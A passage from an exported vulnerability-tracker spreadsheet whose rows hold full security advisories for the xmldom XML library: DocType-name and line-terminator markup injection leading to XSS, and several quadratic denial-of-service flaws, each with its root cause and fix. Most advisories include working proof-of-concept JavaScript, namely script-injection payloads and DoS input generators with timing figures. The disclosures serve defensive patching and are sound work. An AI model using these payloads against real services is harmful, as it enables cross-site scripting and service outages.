become sibling markup in the serialized output.
Because `requireWellFormed: true` — the recommended mitigation for the prior
xmldom injection CVEs — performs no validation on the DocType `name`, this is a
bypass of that control, in the same family as the open element-name
(GHSA-w2rr-34g9-rvrj) and attribute-name (GHSA-4w3w-2rp5-g8jm) name-injection advisories.
## Details
The serializer's `DOCUMENT_TYPE_NODE` case runs the `requireWellFormed` block
only against `publicId`, `systemId`, and `internalSubset`, then pushes
`n.name` directly into the buffer between the `&lt;!DOCTYPE ` prefix and the
closing `&gt;`:
- 0.9.x (v0.9.10, `bb7a085`):
  [serializer DocType case, `lib/dom.js#L3256-L3283`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3256-L3283)
  — the `requireWellFormed` block ([#L3259-L3269](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3259-L3269))
  validates `publicId`/`systemId`/`internalSubset` but not `name`, which is
  emitted verbatim at [#L3270](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3270).
- 0.8.x (v0.8.13, `e5c1480`):
  [serializer DocType case, `lib/dom.js#L1914-L1946`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1914-L1946)
  — same structure; `name` is emitted verbatim at [#L1928](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1928).
- unscoped `xmldom` (v0.6.0, `c80a161`):
  [`lib/dom.js#L1105`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L1105)
  emits `node.name` verbatim; this line predates `requireWellFormed`, so there
  is no well-formedness path at all.
### Enabling write paths
`DocumentType.name` is a plain, writable own-property, so the enabling vector
differs by line:
- **0.9.x** — `createDocumentType()` validates the name via
  `validateQualifiedName` ([`lib/dom.js#L925-L936`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L925-L936),
  validation at [#L926](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L926)),
  so the deliverable vector is a **direct property write**
  (`dt.name = 'html&gt;&lt;script&gt;…'`) to the unguarded own-property.
- **0.8.x** — `createDocumentType()` does **not** validate the name
  ([`lib/dom.js#L456-L464`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L456-L464)),
  so the malicious name is reachable directly through `createDocumentType()` as
  well as via direct property write.
- **unscoped `xmldom` (&lt;= 0.6.0)** — `createDocumentType()` does not validate
  the name ([`lib/dom.js#L286`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L286)),
  same as 0.8.x.
This is the same structural root cause the sibling name-injection advisories
share: the serializer's `requireWellFormed` path validates content delimiters
but no name field, and every name-like field is a plain writable property, so
mutation / direct property-write bypasses any creation-time check.
### Root Cause
1. The serializer's `requireWellFormed` DocType block checks `publicId`,
   `systemId`, and `internalSubset` (the fields hardened by GHSA-f6ww-3ggp-fr8h)
   but has no check for `name`.
2. `DocumentType.name` is a plain writable own-property; on 0.8.x and the
   unscoped package `createDocumentType()` does not validate it either.
3. The serializer emits `name` directly between the doctype delimiters:
   `&lt;!DOCTYPE ${name}…&gt;`.
## Proof of Concept
Run against `@xmldom/xmldom` v0.9.10 (commit `bb7a085`):
```javascript
const { DOMImplementation, XMLSerializer, DOMParser } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const serializer = new XMLSerializer();
// 0.9.x createDocumentType validates the name, so overwrite it via direct property write
const dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);
const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
//
// requireWellFormed: true did NOT prevent the injection (no exception thrown).
// The injected &lt;script&gt; is well-formed XHTML that a browser would execute.
```
Confirmed runtime behavior:
- **0.9.x** — `createDocumentType()` rejects the malicious name at creation
  (`InvalidCharacterError`); a direct write to `dt.name` bypasses that, and
  `serializeToString(…, { requireWellFormed: true })` emits the breakout with no
  exception.
- **Re-parse confirmation** — re-parsing the output shows the injected
  `&lt;script&gt;` is a real second top-level element originating entirely from the
  DocType name: the parser rejects it with
  `HierarchyRequestError: Only one element can be added and only after doctype`.
  A comment-injection variant (`dt.name = 'html&gt;&lt;!--INJECTED--'`, output
  `&lt;!DOCTYPE html&gt;&lt;!--INJECTED--&gt;&lt;r/&gt;`) re-parses cleanly and the injected
  comment node is enumerable, confirming the injected node is structurally live.
- **0.8.x** (v0.8.13, `e5c1480`) — `createDocumentType('html&gt;&lt;script&gt;…', '', '')`
  accepts the malicious name directly (no creation-time validation), and
  `serializeToString(doc, null, null, { requireWellFormed: true })` produces
  `&lt;!DOCTYPE html&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;r/&gt;` with no exception.
A browser reproduction does not apply: browsers keep `DocumentType.name`
`readonly`, so the direct-write vector cannot be reproduced in a browser DOM.
The injection is specific to xmldom exposing `name` as writable and serializing
it without a guard.
## Impact
Applications that build a `DocumentType` node with an attacker-influenced
`name` — via direct property write on any affected line, or via
`createDocumentType()` on 0.8.x and the unscoped package — and serialize the
document are vulnerable to XML/markup injection:
- **XML structure injection** — breaking out of the `&lt;!DOCTYPE …&gt;` declaration
  to inject arbitrary sibling elements, comments, or additional markup into the
  output.
- **XSS via XHTML** — if the serialized output is served as XHTML or processed
  by a browser-based XML parser, an injected `&lt;script&gt;` element (in the XHTML
  namespace) executes.
- **requireWellFormed bypass** — applications that adopted
  `requireWellFormed: true` as a mitigation for the prior injection CVEs
  (including the sibling DocType fields fixed by GHSA-f6ww-3ggp-fr8h) remain
  vulnerable through the DocType `name`.
## Fix Applied
Under `requireWellFormed`, the serializer validates the DocType `name` as a well-formed XML
`Name` and throws `InvalidStateError` when it is not — matching the sibling
`publicId`/`systemId`/`internalSubset` checks. Non-breaking and opt-in; ships on both maintained versions. No
creation-time change is made: 0.9.x already validates the name at `createDocumentType`, and the
0.8.x/unscoped creation gap cannot be closed without a breaking change, so it is left
unfixed.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dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);
// Default path: the ill-formed name is still emitted verbatim (injection present).
console.log(serializer.serializeToString(doc));
// &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
// Opt-in path: serialization throws instead of emitting the breakout.
serializer.serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError
```
### Why the default stays verbatim
W3C DOM Parsing's require-well-formed flag defaults to false, and the browser
`XMLSerializer` emits the name verbatim in that default mode. Unconditionally
throwing would be an unjustified breaking change against that specified default,
so the guard is opt-in behind `{ requireWellFormed: true }`.
### Residual limitation
The default serialization path still emits the ill-formed DocType `name`
verbatim; protection applies only when `requireWellFormed: true` is passed. No
creation-time validation is added for the DocType `name`: 0.9.x already validates
at `createDocumentType`, and the 0.8.x/unscoped creation gap is left unfixed — it
cannot be closed without a breaking change.</t>
        </is>
      </c>
      <c r="T1056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83609</t>
        </is>
      </c>
      <c r="D1057" s="5" t="inlineStr"/>
      <c r="E1057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1057" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1057" s="5" t="inlineStr"/>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr"/>
      <c r="L1057" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1057" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N1057" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1057" s="5" t="inlineStr"/>
      <c r="R1057" s="5" t="inlineStr"/>
      <c r="S1057" s="5" t="inlineStr">
        <is>
          <t>## Summary
An embedded line terminator bypasses xmldom's always-on, WHATWG-mandated creation-time name
validation. `createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` should
reject a malformed qualified name with `InvalidCharacterError`, but a name whose first line is
well-formed slips through and enters the DOM. On serialization it is emitted verbatim, so the
characters after the line terminator inject markup into the output. The injection reaches the default
serialization path, and enabling `requireWellFormed` does not prevent it.
## Details
`createElementNS`, `createAttributeNS`, and `createDocumentType` route through `validateQualifiedName`,
and `createAttribute` performs the analogous check; each validates the name with
`g.QName_exact.test(name)`. `QName_exact = reg('^', QName, '$')` inherits the `m` flag from xmldom's
shared regexp builder, so the matcher accepts any name whose first line is a valid `QName` and leaves
the remaining lines unconstrained (see Root Cause).
### Root Cause
1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. `validateQualifiedName` / `createAttribute` validate with `.test()` against such a production, so a
   line terminator followed by breakout markup passes and the malformed name is stored.
The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doc = impl.createDocument('urn:x', 'root', null);
const el = doc.createElementNS('urn:x', 'a\n&gt;&lt;script&gt;x&lt;/script');  // ACCEPTED (no throw)
doc.documentElement.appendChild(el);
// DEFAULT serialization — requireWellFormed NOT set:
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;root xmlns="urn:x"&gt;&lt;a
// &gt;&lt;script&gt;x&lt;/script/&gt;&lt;/root&gt;          &lt;-- injected element on the default path
// Control: createElementNS('urn:x', 'bad&gt;name') throws InvalidCharacterError, confirming the check is
// active and specifically bypassed by the line terminator.
```
## Impact
- **Bypass of the always-on WHATWG creation-time name validation** (`InvalidCharacterError`): a
  malformed name the standard requires be rejected at creation is instead admitted to the DOM.
- **Markup / structure injection.** An application relying on the `create*` APIs to reject malformed
  names (the standard behavior) as a trust boundary is exposed; where the serialized output reaches an
  HTML context, downstream XSS.
- **No serializer option mitigates it.** The admitted name is emitted verbatim under *both* the default
  path and `requireWellFormed: true` — the strict serializer shares the same `m`-flagged blind spot
  (the subject of the sibling serializer advisories) — so the bypassed creation-time check was the only
  layer that could have stopped it. Demonstrated for all four `create*` sites in
  `poc_creation_strict_serialization_bypass.cjs`.
## Fix Applied
`createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` now reject a name
containing a line terminator with `InvalidCharacterError` — the same result they already give for
other malformed names — because name validation now applies to the whole string. The
`requireWellFormed` serializer's name checks are corrected by the same change. The fix is
non-breaking: such a name was already invalid, and no previously-accepted well-formed name is affected.</t>
        </is>
      </c>
      <c r="T1057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83612</t>
        </is>
      </c>
      <c r="D1058" s="5" t="inlineStr"/>
      <c r="E1058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1058" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1058" s="5" t="inlineStr"/>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr"/>
      <c r="L1058" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1058" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N1058" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1058" s="5" t="inlineStr"/>
      <c r="R1058" s="5" t="inlineStr"/>
      <c r="S1058" s="5" t="inlineStr">
        <is>
          <t>## Summary
In HTML mode (`text/html`), a raw-text element (`script`, `style`, `textarea`, `title`) whose closing
tag differs in case from its opening tag (e.g. `&lt;/ScRiPt&gt;` for `&lt;script&gt;`) is mishandled by the
parser, producing quadratic (O(n²)) output growth — a small crafted document parses and serializes
into output orders of magnitude larger, exhausting CPU and memory. A modest input of tens of KB can
therefore cause a denial of service in any service that parses untrusted HTML with xmldom. Only HTML
mode is affected.
## Details
The parser calls `parseHtmlSpecialContent` for each raw-text element in HTML mode, matched via
`isHTMLRawTextElement` / `isHTMLEscapableRawTextElement` (so all four types — `script`, `style`,
`textarea`, `title` — are in scope). It searches for the element's closing tag with
`source.indexOf('&lt;/' + tagName + '&gt;', elStartEnd)`, a byte-for-byte case-sensitive match. A
mixed-case closing tag never matches, so the search returns `-1`, and the following
`source.substring(elStartEnd + 1, -1)` extracts text backwards from the start of the document
instead of the element's content. The function then returns `-1` to the parse loop, which cannot
advance normally and falls back to character-by-character reprocessing. Every raw-text element
re-captures all source text preceding it, so output grows as O(n²) in the number of such elements.
### Root Cause
1. **Case-sensitive close-tag search** (`lib/sax.js:549`): `source.indexOf('&lt;/' + tagName + '&gt;',
   elStartEnd)` does not fold case, contrary to the WHATWG HTML RAWTEXT end-tag-name rule.
2. **Unguarded `-1`** (`lib/sax.js:550`): `source.substring(elStartEnd + 1, elEndStart)` runs even
   when `elEndStart === -1`, extracting text backwards from position 0.
3. **Unstable progression** (`lib/sax.js:556`): the function returns `elEndStart` (`-1`), driving
   repeated character-by-character fallback in the parse loop.
## Affected Versions
Only the `0.9.x` line is affected — the amplification was introduced in `0.9.0-beta.1` when
`parseHtmlSpecialContent` was refactored, and remains through `0.9.11`. The `0.8.x` line is **not**
affected: its older `parseHtmlSpecialContent` does not amplify, despite sharing the same
case-sensitive `indexOf`.
## Proof of Concept
```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');
const n = 1000;
const payload = '&lt;html&gt;&lt;body&gt;' + '&lt;script&gt;x&lt;/ScRiPt&gt;'.repeat(n) + '&lt;/body&gt;&lt;/html&gt;';
const doc = new DOMParser().parseFromString(payload, 'text/html');
const out = new XMLSerializer().serializeToString(doc);
console.log(payload.length, out.length, (out.length / payload.length).toFixed(1) + 'x');
// 18026 9037063 501.3x  — an 18 KB input yields ~9 MB of output
```
Output size grows quadratically with the number of case-mismatched raw-text elements:
```
Repeats | Input len | Output len | Ratio
1       | 44        | 109        | 2.5x
100     | 1826      | 93763      | 51.3x
500     | 9026      | 2268563    | 251.3x
1000    | 18026     | 9037063    | 501.3x
2000    | 36026     | 36074063   | 1001.3x
```
Proof of Concept from @KarimTantawey (tested with `script`); the same amplification occurs for `style`,
`textarea`, and `title`.
## Impact
Small attacker payloads can force disproportionate CPU and memory usage in services that
parse and serialize untrusted HTML via xmldom. The quadratic growth means a modest-sized input
(tens of kilobytes) can produce output in the tens or hundreds of megabytes, potentially
exhausting memory or causing timeouts.
The attack only requires HTML mode (`text/html` MIME type) and mixed-case closing tags for
any of the four raw-text element types. No special configuration or error handler setup is needed.
## Severity note
The CVSS 4.0 vector scores availability only (`VA:H`, with `VC:N/VI:N`): the flaw neither discloses
nor corrupts data, but a small untrusted HTML input (tens of KB) can force output and memory in the
tens to hundreds of MB, enough to exhaust a service's heap or stall its event loop. It is reachable
with no authentication, configuration, or error-handler setup — only that the application parses
untrusted `text/html` and serializes the result.
## Fix Applied
The raw-text closing tag is now matched case-insensitively in HTML raw-text mode (per the WHATWG HTML
[RAWTEXT end-tag rule](https://html.spec.whatwg.org/multipage/parsing.html#rawtext-end-tag-name-state)),
and a missing closing tag is handled explicitly, removing the quadratic output amplification. Output
for well-formed input is unchanged. Non-breaking; 0.9.x-only.</t>
        </is>
      </c>
      <c r="T1058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83613</t>
        </is>
      </c>
      <c r="D1059" s="5" t="inlineStr"/>
      <c r="E1059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1059" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1059" s="5" t="inlineStr"/>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr"/>
      <c r="L1059" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1059" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1059" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1059" s="5" t="inlineStr"/>
      <c r="R1059" s="5" t="inlineStr"/>
      <c r="S1059" s="5" t="inlineStr">
        <is>
          <t>## Summary
xmldom builds the attribute collection of every parsed element by inserting attributes one at a
time into a DOM `NamedNodeMap`. Each insertion first performs a **linear scan of all
already-inserted attributes** to enforce the DOM uniqueness rule (no two attributes with the same
qualified name / namespace+local-name). Parsing an element that carries `M` distinct attributes
therefore costs `1 + 2 + … + M = O(M²)` comparisons.
Because the trigger is simply "one element with many attributes", the attack payload is a
**fully well-formed XML document**. No malformed markup, no error recovery, and no non-default
parser options are involved — parsing completes silently with zero `warning`/`error`/`fatalError`
events. An attacker who can submit a modest, highly compressible document (a single element with
tens of thousands of attributes, ~340 KB uncompressed) can consume seconds of single-threaded CPU
per request, enabling an unauthenticated denial of service.
This is distinct from the known quadratic-**memory** namespace-map issue: it burns **CPU** and it
does not require any namespace declarations or nesting.
## Details
The DOM content handler adds each attribute of a starting element by calling
`el.setAttributeNode(attr)` in a loop:
```js
// DOMHandler.startElement
for (var i = 0; i &lt; len; i++) {
	var namespaceURI = attrs.getURI(i);
	var value = attrs.getValue(i);
	var qName = attrs.getQName(i);
	var attr = doc.createAttributeNS(namespaceURI, qName);
	attr.value = attr.nodeValue = value;
	el.setAttributeNode(attr);          // O(existing attrs) each — see below
}
```
https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L370-L387
`setAttributeNode` delegates to `NamedNodeMap.setNamedItem`, which calls `getNamedItemNS` to look
for an existing attribute with the same namespace URI and local name before appending:
```js
setNamedItem: function (attr) {
	var el = attr.ownerElement;
	if (el &amp;&amp; el !== this._ownerElement) {
		throw new DOMException(DOMException.INUSE_ATTRIBUTE_ERR);
	}
	var oldAttr = this.getNamedItemNS(attr.namespaceURI, attr.localName);  // linear scan
	if (oldAttr === attr) {
		return attr;
	}
	_addNamedNode(this._ownerElement, this, attr, oldAttr);
	return oldAttr;
},
```
https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L612-L623
`getNamedItemNS` walks the whole list on every call:
```js
getNamedItemNS: function (namespaceURI, localName) {
	if (!namespaceURI) {
		namespaceURI = null;
	}
	var i = 0;
	while (i &lt; this.length) {
		var node = this[i];
		if (node.localName === localName &amp;&amp; node.namespaceURI === namespaceURI) {
			return node;
		}
		i++;
	}
	return null;
},
```
https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L702-L715
For the i-th attribute the scan visits `i-1` entries, so inserting `M` distinct attributes performs
`Θ(M²)` comparisons. There is no hash index or set keyed by name; the map is a plain
array-backed structure.
The same structure exists on 0.8.x. There `setNamedItem` dedups via
`getNamedItem(attr.nodeName)` instead of `getNamedItemNS`, but that method is likewise a full linear
scan, so the complexity is identical:
- `startElement` loop / `setAttributeNode`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L159-L176
- `setNamedItem` → linear `getNamedItem`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L286-L308
The linear-scan `NamedNodeMap` predates the `@xmldom/xmldom` fork and is present unchanged in the
unscoped `xmldom` package back to its earliest published release. In `xmldom@0.1.0`, parsing already
inserts each attribute one at a time (`DOMHandler.startElement` loops calling
`setAttributeNS` → `setAttributeNode` → `NamedNodeMap.setNamedItem`), and `setNamedItem` dedups by
calling `getNamedItemNS`, which is a full linear `while (i--)` scan of the already-inserted
attributes — the identical `O(M²)` structure. The whole unscoped line (`0.1.0` … `0.6.0`) is
therefore affected; the earliest published tag (`0.1.0`) was verified to contain the per-insert
linear dedup scan.
## Proof of Concept
A single well-formed element with `M` distinct attributes. No malformed markup and no options:
```js
'use strict';
var DOMParser = require('@xmldom/xmldom').DOMParser;
function buildDoc(m) {
	var parts = new Array(m);
	for (var i = 0; i &lt; m; i++) parts[i] = 'a' + i + '="x"';
	return '&lt;r ' + parts.join(' ') + '/&gt;';   // &lt;r a0="x" a1="x" ... a{M-1}="x"/&gt;
}
for (var _i = 0, sizes = [2000, 4000, 8000, 16000, 32000]; _i &lt; sizes.length; _i++) {
	var m = sizes[_i];
	var xml = buildDoc(m);
	var t0 = process.hrtime.bigint();
	var doc = new DOMParser().parseFromString(xml, 'text/xml');  // silent: no error events
	var ms = Number(process.hrtime.bigint() - t0) / 1e6;
	console.log(m + ' attrs, ' + xml.length + ' bytes -&gt; ' + ms.toFixed(1) + ' ms; parsed=' +
		doc.documentElement.attributes.length);
}
```
Measured with Node.js v18.20.8 (wall-clock; absolute numbers vary by host, the **scaling** is the
load-bearing fact):
**`@xmldom/xmldom` 0.9.10:**
| M (attributes) | input bytes | time (ms) | ratio vs prev |
|---:|---:|---:|---:|
| 2000  | 18,894  | 13.4   | —     |
| 4000  | 38,894  | 38.7   | ×2.9  |
| 8000  | 78,894  | 100.8  | ×2.6  |
| 16000 | 164,894 | 406.2  | ×4.0  |
| 32000 | 340,894 | 2149.5 | ×5.3  |
**`@xmldom/xmldom` 0.8.13:**
| M (attributes) | input bytes | time (ms) |
|---:|---:|---:|
| 2000  | 18,894  | 10.6   |
| 4000  | 38,894  | 19.9   |
| 8000  | 78,894  | 75.9   |
| 16000 | 164,894 | 657.7  |
| 32000 | 340,894 | 1643.2 |
**`xmldom` (unscoped) 0.6.0:** 4000 → 28.2 ms, 8000 → 131.8 ms, 16000 → 545.2 ms (≈ ×4 per doubling).
Time grows ≈ ×4 per doubling of `M` — quadratic. About **340 KB of well-formed input costs ~1.6–2.1 s
of single-threaded CPU**, and it keeps scaling: doubling the attribute count quadruples the cost.
The document is trivially generated and compresses to a few kilobytes on the wire.
## Impact
Unauthenticated, remotely triggerable denial of service against any service that parses
attacker-influenced XML/HTML with xmldom. A single request holds one event-loop thread for seconds;
a handful of concurrent requests can saturate CPU and stall the process. Because the payload is a
plain well-formed document (one element, many attributes), it passes any "must be well-formed" gate
and reaches the parser before any application-level validation (e.g. schema checks or signature
verification) can run. The payload is highly compressible, so it is effective over compressed
transports.
## Fix Applied
Replaced the per-insert linear duplicate scan on the parse-time dedup path with a name-keyed
index, so de-duplicating an element's attributes during parse is O(M) instead of O(M²) — a
well-formed-but-hostile attribute list can no longer wedge the parse. Behavior-preserving: attribute
order and duplicate resolution (last value wins, first position kept) are byte-identical. Non-breaking
and independent of `requireWellFormed`; ships on both maintained versions.</t>
        </is>
      </c>
      <c r="T1059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83614</t>
        </is>
      </c>
      <c r="D1060" s="5" t="inlineStr"/>
      <c r="E1060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1060" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1060" s="5" t="inlineStr"/>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr"/>
      <c r="L1060" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1060" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1060" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1060" s="5" t="inlineStr"/>
      <c r="R1060" s="5" t="inlineStr"/>
      <c r="S1060" s="5" t="inlineStr">
        <is>
          <t>## Summary
`xmldom`'s malformed-input **error-recovery path** has two quadratic-time (O(n²)) behaviors that a
single crafted input triggers together, so a tiny, highly compressible document (tens of KB) stalls
the Node.js event loop for multiple seconds. It is reachable from `DOMParser.parseFromString` under
**default options** — i.e. from unauthenticated, network-delivered XML — making this an unauthenticated
denial of service. One of the two behaviors, the `normalize()` adjacent-text merge, is **additionally
reachable programmatically** — via a plain `normalize()` call on a DOM built with adjacent text nodes,
independent of the parser — so its fix must live in `normalize()`, not only in a parser bound.
## Details
### Finding A — `parseElementStartPart` quadratic re-scan
A `&lt;` character is not a delimiter in any tag-parsing state, so `parseElementStartPart` scans
forward character-by-character over any embedded `&lt;` until it reaches the next `&gt;` (or end of
input), then validates the accumulated slice as a tag name and throws `invalid tagName:` on failure.
The main loop catches this, reports an `error`, sets `end = -1`, and recovers by advancing a single
character (`appendText(Math.max(tagStart, start) + 1)`). With a long run of `&lt;` and a distant `&gt;`,
each of the O(n) recovery retries performs an O(n) scan plus an O(n) anchored regex validation over
the growing candidate ⇒ **O(n²)**.
Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):
- `parseElementStartPart` character scan — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L263-L461
- tag-name validation (`setTagName` → throws `invalid tagName`) — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L886-L891
- main-loop `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L234-L242
- single-character recovery fallback — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L247
Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):
- `parseElementStartPart` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L227
- `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L202-L208
- recovery fallback — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L213
- `setTagName` validation — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L616-L621
### Finding B — `normalize()` adjacent-text O(K²) merge
`endDocument()` calls `document.normalize()`. For a parent with K adjacent text nodes (produced by
the one-character recovery of Finding A), `normalize()` performs K−1 merges. Each merge does a
